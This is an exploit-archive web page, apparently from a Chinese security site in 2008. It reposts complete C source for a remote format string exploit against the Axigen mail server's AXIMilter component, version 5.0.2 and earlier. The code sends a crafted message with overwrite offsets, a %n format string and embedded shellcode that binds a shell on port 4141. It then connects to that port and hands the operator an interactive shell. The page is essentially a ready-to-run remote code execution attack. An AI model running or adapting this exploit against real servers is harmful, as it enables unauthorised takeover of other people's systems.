Axigen <= 5.0.2 AXIMilter Remote Format String Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Axigen <= 5.0.2 AXIMilter Remote Format String Exploit

来源：www.vfocus.net 作者：hempel 发布时间：2008-01-22

/*
* Axigen 5.0.x AXIMilter Format String Exploit
*
* by hempel (JAN 16 2008)
*
* thx to mu-b (digit-labs.org)
*
*/
#include <stdio.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <unistd.h>
#include <string.h>

char buf[] =
    "FROM:\r\nEHLO:\r\nCNIP:\r\nCNPO:\r\nCNHO: "
/* offsets */
    "\xb8\x96\x05\x08\xb9\x96\x05\x08\xba\x96\x05\x08\xbb\x96\x05\x08"
    "\xbc\x96\x05\x08\xbd\x96\x05\x08\xbe\x96\x05\x08\xbf\x96\x05\x08"
    "\xc0\x96\x05\x08"
/* format string */
    "%35u%6851$n%70u%6850$hhn%47u%6846$hhn%36u%6854$hhn%31u%6853$hhn%"
    "17u%6852$hhn%134u%6847$hhn%111u%6848$hhn%259u%6849$hhn"
    "\r\nRCPT:\r\nVERI: "
/* bindshell code (port 4141) */
    "\x33\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xdc"
    "\xc8\x06\xb7\x83\xeb\xfc\xe2\xf4\xed\x13\x55\xf4\x8f\xa2\x04\xdd"
    "\xba\x90\x9f\x3e\x3d\x05\x86\x21\x9f\x9a\x60\xdf\xcc\xe5\x60\xe4"
    "\x55\x29\x6c\xd1\x84\x98\x57\xe1\x55\x29\xcb\x37\x6c\xae\xd7\x54"
    "\x11\x48\x54\xe5\x8a\x8b\x8f\x56\x6c\xae\xcb\x37\x4f\xa2\x04\xee"
    "\x6c\xf7\xcb\x37\x95\xb1\xff\x07\xd7\x9a\x6e\x98\xf3\xbb\x6e\xdf"
    "\xf3\xaa\x6f\xd9\x55\x2b\x54\xe4\x55\x29\xcb\x37"
    "\r\nPASS:\r\n";

static int
shell_sock (char *host, int port)
{
    struct sockaddr_in addr;
    int sockfd;

    sockfd = socket(PF_INET, SOCK_STREAM, 0);
    if (sockfd == -1) {
        perror ("socket");
return 0;
    }

    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = inet_addr(host);
    addr.sin_port = htons(port);

    if (connect(sockfd, (struct sockaddr *) &addr, sizeof(addr)) == -1) {
        perror ("connect");
return 0;
    }

    return sockfd;
}

static void
shell_run (int sockfd)
{
    int rs;
    fd_set rset;
    char rbuf[1024], *cmd = "id; uname -a; uptime\n";

    write(sockfd, cmd, strlen(cmd));

    while (1) {
        FD_ZERO (&rset);
        FD_SET (sockfd, &rset);
        FD_SET (STDIN_FILENO, &rset);

select (sockfd + 1, &rset, NULL, NULL, NULL);
if (FD_ISSET (sockfd, &rset)) {
    rs = read (sockfd, rbuf, sizeof(rbuf) - 1);
            if (rs <= 0) {
                perror("read");
return;
            }
    rbuf[rs] = '\0';
            printf ("%s", rbuf);
        }

if (FD_ISSET (STDIN_FILENO, &rset)) {
    rs = read(STDIN_FILENO, rbuf, sizeof(rbuf) - 1);
            if (rs > 0) {
        rbuf[rs] = '\0';
        write (sockfd, rbuf, rs);
            }
        }
    }
}

int
main(int argc, char **argv)
{
    int sockfd, port, buf_len;
    struct sockaddr_in addr;
    char *host;

    printf("AXIGEN 5.0.x AXIMilter format string Exploit by hempel\n");

    if (argc < 2) {
printf("%s host port\n", *argv);
return 0;
    }

    host = argv[1];
    port = atoi(argv[2]);

    sockfd = socket(PF_INET, SOCK_STREAM, 0);
    if(sockfd == -1) {
perror("socket");
return -1;
    }

    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = inet_addr(host);
    addr.sin_port = htons(port);

    if (connect(sockfd, (struct sockaddr *) &addr, sizeof(addr)) == -1) {
perror("connect");
return -1;
    }

    buf_len = sizeof(buf) - 1;
    if (write(sockfd, buf, buf_len) == -1) {
perror("write");
return -1;
    }
    close(sockfd);

    printf("trying shell at %s:4141 ...", host);
    fflush(stdout);
    sockfd = shell_sock(host, 4141);
    if (sockfd) {
printf("w00t!\n");
shell_run(sockfd);
    } else {
printf("nope!\n");
    }

    return 0;
}

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告